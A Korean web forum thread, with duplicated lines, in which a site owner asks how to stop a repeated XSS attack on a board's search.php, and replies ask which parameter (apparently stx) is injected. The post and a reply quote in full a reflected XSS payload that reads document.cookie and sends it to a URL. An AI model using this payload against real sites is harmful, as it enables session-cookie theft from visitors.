게시판에 아래 키워드를 입력하면.. 정보
게시판에 아래 키워드를 입력하면..본문
이 키워드를 입력하면 사이트에 에러가 나버리는데요..
계속 누가 악질적으로 이짓을해서 일단 검색을 아예 빼버렷는데
"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이걸 bbs/search.php에 날리면 그대로 먹히거든요;;
어떻게 해결하죠..ㄷㄷ
계속 누가 악질적으로 이짓을해서 일단 검색을 아예 빼버렷는데
"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이걸 bbs/search.php에 날리면 그대로 먹히거든요;;
어떻게 해결하죠..ㄷㄷ
댓글 전체
구체적으로 설명을해주셔야할것같습니다.
예를들어
http://test.com/gnu4/bbs/search.php?"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이런식으로요.
어떤변수에어떻게넣는지 그런게 중요할듯하네요.
예를들어
http://test.com/gnu4/bbs/search.php?"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이런식으로요.
어떤변수에어떻게넣는지 그런게 중요할듯하네요.
검색이니까 당연히 stx아닐까요.ㄷㄷ
검색 파일에 외부에서 변수받아오는 것은 stx 뿐인걸로 아는데요..
검색 파일에 외부에서 변수받아오는 것은 stx 뿐인걸로 아는데요..
